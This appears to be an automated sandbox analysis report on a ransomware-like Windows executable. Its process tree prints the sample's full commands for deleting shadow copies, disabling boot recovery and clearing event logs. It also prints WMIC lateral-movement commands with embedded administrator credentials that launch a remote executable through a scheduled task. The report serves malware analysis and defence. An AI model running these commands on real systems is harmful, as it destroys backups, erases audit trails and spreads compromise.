Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
22-01-2021 10:17
Static task
static1
Behavioral task
behavioral1
Sample
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
Resource
win10v20201028
General
-
Target
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
-
Size
1.0MB
-
MD5
3281b2d95e7123a429001400c10ebe28
-
SHA1
b97308ea9f9c410188d43c34a867fa42c9e9128e
-
SHA256
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1
-
SHA512
2d8829ba0023a0b0f2e3aaa48301f6458fec20e20c019840610f7f862a54615f46de28a5aeb470ae0df5e046d3a8da0310dc29df0b3f60f36ffe4438c469ff11
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1476 664 cmd.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 556 664 cmd.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1476 bcdedit.exe 1124 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exedescription ioc process File opened (read-only) \??\R: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\Y: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\B: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\F: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\I: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\Q: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\K: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\U: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\V: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\L: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\N: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\O: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\T: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\A: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\E: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\G: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\J: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\W: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\X: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\Z: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\H: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\M: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\P: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\S: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of AdjustPrivilegeToken 179 IoCs
Processes:
WMIC.exeWMIC.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 1252 WMIC.exe Token: SeSecurityPrivilege 1252 WMIC.exe Token: SeTakeOwnershipPrivilege 1252 WMIC.exe Token: SeLoadDriverPrivilege 1252 WMIC.exe Token: SeSystemProfilePrivilege 1252 WMIC.exe Token: SeSystemtimePrivilege 1252 WMIC.exe Token: SeProfSingleProcessPrivilege 1252 WMIC.exe Token: SeIncBasePriorityPrivilege 1252 WMIC.exe Token: SeCreatePagefilePrivilege 1252 WMIC.exe Token: SeBackupPrivilege 1252 WMIC.exe Token: SeRestorePrivilege 1252 WMIC.exe Token: SeShutdownPrivilege 1252 WMIC.exe Token: SeDebugPrivilege 1252 WMIC.exe Token: SeSystemEnvironmentPrivilege 1252 WMIC.exe Token: SeRemoteShutdownPrivilege 1252 WMIC.exe Token: SeUndockPrivilege 1252 WMIC.exe Token: SeManageVolumePrivilege 1252 WMIC.exe Token: 33 1252 WMIC.exe Token: 34 1252 WMIC.exe Token: 35 1252 WMIC.exe Token: SeIncreaseQuotaPrivilege 1268 WMIC.exe Token: SeSecurityPrivilege 1268 WMIC.exe Token: SeTakeOwnershipPrivilege 1268 WMIC.exe Token: SeLoadDriverPrivilege 1268 WMIC.exe Token: SeSystemProfilePrivilege 1268 WMIC.exe Token: SeSystemtimePrivilege 1268 WMIC.exe Token: SeProfSingleProcessPrivilege 1268 WMIC.exe Token: SeIncBasePriorityPrivilege 1268 WMIC.exe Token: SeCreatePagefilePrivilege 1268 WMIC.exe Token: SeBackupPrivilege 1268 WMIC.exe Token: SeRestorePrivilege 1268 WMIC.exe Token: SeShutdownPrivilege 1268 WMIC.exe Token: SeDebugPrivilege 1268 WMIC.exe Token: SeSystemEnvironmentPrivilege 1268 WMIC.exe Token: SeRemoteShutdownPrivilege 1268 WMIC.exe Token: SeUndockPrivilege 1268 WMIC.exe Token: SeManageVolumePrivilege 1268 WMIC.exe Token: 33 1268 WMIC.exe Token: 34 1268 WMIC.exe Token: 35 1268 WMIC.exe Token: SeIncreaseQuotaPrivilege 1432 WMIC.exe Token: SeSecurityPrivilege 1432 WMIC.exe Token: SeTakeOwnershipPrivilege 1432 WMIC.exe Token: SeLoadDriverPrivilege 1432 WMIC.exe Token: SeSystemProfilePrivilege 1432 WMIC.exe Token: SeSystemtimePrivilege 1432 WMIC.exe Token: SeProfSingleProcessPrivilege 1432 WMIC.exe Token: SeIncBasePriorityPrivilege 1432 WMIC.exe Token: SeCreatePagefilePrivilege 1432 WMIC.exe Token: SeBackupPrivilege 1432 WMIC.exe Token: SeRestorePrivilege 1432 WMIC.exe Token: SeShutdownPrivilege 1432 WMIC.exe Token: SeDebugPrivilege 1432 WMIC.exe Token: SeSystemEnvironmentPrivilege 1432 WMIC.exe Token: SeRemoteShutdownPrivilege 1432 WMIC.exe Token: SeUndockPrivilege 1432 WMIC.exe Token: SeManageVolumePrivilege 1432 WMIC.exe Token: 33 1432 WMIC.exe Token: 34 1432 WMIC.exe Token: 35 1432 WMIC.exe Token: SeIncreaseQuotaPrivilege 1252 WMIC.exe Token: SeSecurityPrivilege 1252 WMIC.exe Token: SeTakeOwnershipPrivilege 1252 WMIC.exe Token: SeLoadDriverPrivilege 1252 WMIC.exe -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.execmd.execmd.execmd.exedescription pid process target process PID 1832 wrote to memory of 1252 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 1832 wrote to memory of 1252 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 1832 wrote to memory of 1252 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 1832 wrote to memory of 1252 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 1832 wrote to memory of 1268 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 1832 wrote to memory of 1268 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 1832 wrote to memory of 1268 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 1832 wrote to memory of 1268 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 1832 wrote to memory of 1772 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe cmd.exe PID 1832 wrote to memory of 1772 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe cmd.exe PID 1832 wrote to memory of 1772 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe cmd.exe PID 1832 wrote to memory of 1772 1832 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe cmd.exe PID 1772 wrote to memory of 1432 1772 cmd.exe WMIC.exe PID 1772 wrote to memory of 1432 1772 cmd.exe WMIC.exe PID 1772 wrote to memory of 1432 1772 cmd.exe WMIC.exe PID 1772 wrote to memory of 1432 1772 cmd.exe WMIC.exe PID 556 wrote to memory of 564 556 cmd.exe WMIC.exe PID 556 wrote to memory of 564 556 cmd.exe WMIC.exe PID 556 wrote to memory of 564 556 cmd.exe WMIC.exe PID 1476 wrote to memory of 1580 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1580 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1580 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1392 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1392 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1392 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 2008 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 2008 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 2008 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1828 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1828 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1828 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1992 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1992 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1992 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1300 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1300 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1300 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1592 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1592 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1592 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1724 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1724 1476 cmd.exe wevtutil.exe PID 1476 wrote to memory of 1724 1476 cmd.exe wevtutil.exe PID 556 wrote to memory of 1476 556 cmd.exe bcdedit.exe PID 556 wrote to memory of 1476 556 cmd.exe bcdedit.exe PID 556 wrote to memory of 1476 556 cmd.exe bcdedit.exe PID 556 wrote to memory of 1124 556 cmd.exe bcdedit.exe PID 556 wrote to memory of 1124 556 cmd.exe bcdedit.exe PID 556 wrote to memory of 1124 556 cmd.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe"C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe"1⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exewevtutil cl "security"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "windows powershell"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "security"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "Application"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "HardwareEvents"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "System"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "Setup"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "Setup"2⤵
-
C:\Windows\system32\cmd.execmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC.exe shadowcopy delete /nointeractive2⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/564-7-0x0000000000000000-mapping.dmp
-
memory/1124-25-0x0000000000000000-mapping.dmp
-
memory/1252-3-0x0000000000000000-mapping.dmp
-
memory/1268-4-0x0000000000000000-mapping.dmp
-
memory/1300-18-0x0000000000000000-mapping.dmp
-
memory/1392-10-0x0000000000000000-mapping.dmp
-
memory/1432-6-0x0000000000000000-mapping.dmp
-
memory/1476-24-0x0000000000000000-mapping.dmp
-
memory/1580-8-0x0000000000000000-mapping.dmp
-
memory/1580-9-0x000007FEFBF41000-0x000007FEFBF43000-memory.dmpFilesize
8KB
-
memory/1592-20-0x0000000000000000-mapping.dmp
-
memory/1724-22-0x0000000000000000-mapping.dmp
-
memory/1772-5-0x0000000000000000-mapping.dmp
-
memory/1828-14-0x0000000000000000-mapping.dmp
-
memory/1832-2-0x0000000076371000-0x0000000076373000-memory.dmpFilesize
8KB
-
memory/1992-16-0x0000000000000000-mapping.dmp
-
memory/2008-12-0x0000000000000000-mapping.dmp